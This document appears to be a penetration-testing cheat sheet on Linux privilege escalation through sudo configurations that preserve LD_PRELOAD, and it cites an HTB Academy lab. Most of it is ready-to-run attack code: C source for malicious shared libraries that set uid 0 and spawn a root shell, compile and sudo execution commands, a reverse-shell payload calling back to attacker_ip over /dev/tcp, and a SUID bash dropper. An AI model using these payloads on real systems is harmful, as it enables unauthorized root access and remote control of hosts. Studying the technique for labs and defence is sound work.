πShared Libraries
π― Overview
LD_PRELOAD environment variable allows loading custom shared libraries before program execution, enabling privilege escalation when combined with sudo configurations that preserve environment variables.
π Prerequisites
Check for LD_PRELOAD in Sudo
# Check sudo configuration
sudo -l
# Look for env_keep+=LD_PRELOAD in output:
# env_keep+=LD_PRELOAD
# Example vulnerable entry:
# (root) NOPASSWD: /usr/sbin/apache2 restartLibrary Dependencies Analysis
# View shared library dependencies
ldd /bin/ls
ldd /usr/sbin/apache2
# Check LD_PRELOAD current value
echo $LD_PRELOADπ LD_PRELOAD Exploitation
Create Malicious Library
# Create malicious shared library code
cat > root.c << EOF
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}
EOFCompile Shared Library
# Compile as shared library
gcc -fPIC -shared -o root.so root.c -nostartfiles
# Verify compilation
file root.so
# Output: root.so: ELF 64-bit LSB shared objectExecute Privilege Escalation
# Use LD_PRELOAD with sudo command
sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart
# Should drop to root shell immediately
id
# uid=0(root) gid=0(root) groups=0(root)π§ Alternative Payloads
Reverse Shell Library
cat > revshell.c << EOF
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
void _init() {
unsetenv("LD_PRELOAD");
system("bash -c 'bash -i >& /dev/tcp/attacker_ip/4444 0>&1'");
}
EOF
gcc -fPIC -shared -o revshell.so revshell.c -nostartfiles
sudo LD_PRELOAD=/tmp/revshell.so /allowed/sudo/commandSUID Binary Creation
cat > suid.c << EOF
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
void _init() {
unsetenv("LD_PRELOAD");
system("cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash");
}
EOF
gcc -fPIC -shared -o suid.so suid.c -nostartfiles
sudo LD_PRELOAD=/tmp/suid.so /allowed/sudo/command
/tmp/rootbash -p # Execute SUID bashπ Detection & Enumeration
LD_PRELOAD Vulnerability Check
#!/bin/bash
echo "=== LD_PRELOAD VULNERABILITY CHECK ==="
echo "[+] Checking sudo configuration for LD_PRELOAD:"
sudo -l 2>/dev/null | grep -i "LD_PRELOAD"
echo "[+] Current LD_PRELOAD value:"
echo $LD_PRELOAD
echo "[+] Available sudo commands with env_keep:"
sudo -l 2>/dev/null | grep -A 10 "env_keep.*LD_PRELOAD"
echo "[+] Compiler availability:"
which gcc g++ 2>/dev/nullEnvironment Variable Analysis
# Check all environment variables kept by sudo
sudo -l | grep "env_keep"
# Test LD_PRELOAD functionality
echo 'void _init(){system("echo LD_PRELOAD works");}' > test.c
gcc -fPIC -shared -o test.so test.c -nostartfiles
LD_PRELOAD=./test.so ls # Should show "LD_PRELOAD works"π Quick Reference
Immediate Checks
# Check for LD_PRELOAD in sudo
sudo -l | grep "LD_PRELOAD"
# Available compilers
which gcc g++
# Sudo commands available
sudo -l | grep "NOPASSWD"Emergency Exploitation
# Quick LD_PRELOAD escalation
echo 'void _init(){unsetenv("LD_PRELOAD");setuid(0);system("/bin/bash");}' > root.c
gcc -fPIC -shared -o root.so root.c -nostartfiles
sudo LD_PRELOAD=./root.so /allowed/sudo/commandHTB Academy Example
# 1. Check sudo configuration
sudo -l
# Look for: env_keep+=LD_PRELOAD
# 2. Create malicious library
gcc -fPIC -shared -o root.so root.c -nostartfiles
# 3. Execute with any allowed sudo command
sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart
# 4. Access flag
cat /root/ld_preload/flag.txtβ οΈ Exploitation Requirements
Must Have
Sudo access to any command (even non-GTFOBin)
env_keep+=LD_PRELOAD in sudoers configuration
GCC compiler available on target system
Write permissions in accessible directory
Common Scenarios
Non-exploitable sudo commands with LD_PRELOAD kept
Service restart permissions (apache, nginx, etc.)
Safe commands made dangerous by LD_PRELOAD
Custom applications with sudo permissions
LD_PRELOAD exploitation transforms safe sudo commands into privilege escalation vectors - environment variable preservation combined with shared library injection bypasses command restrictions for immediate root access.
Last updated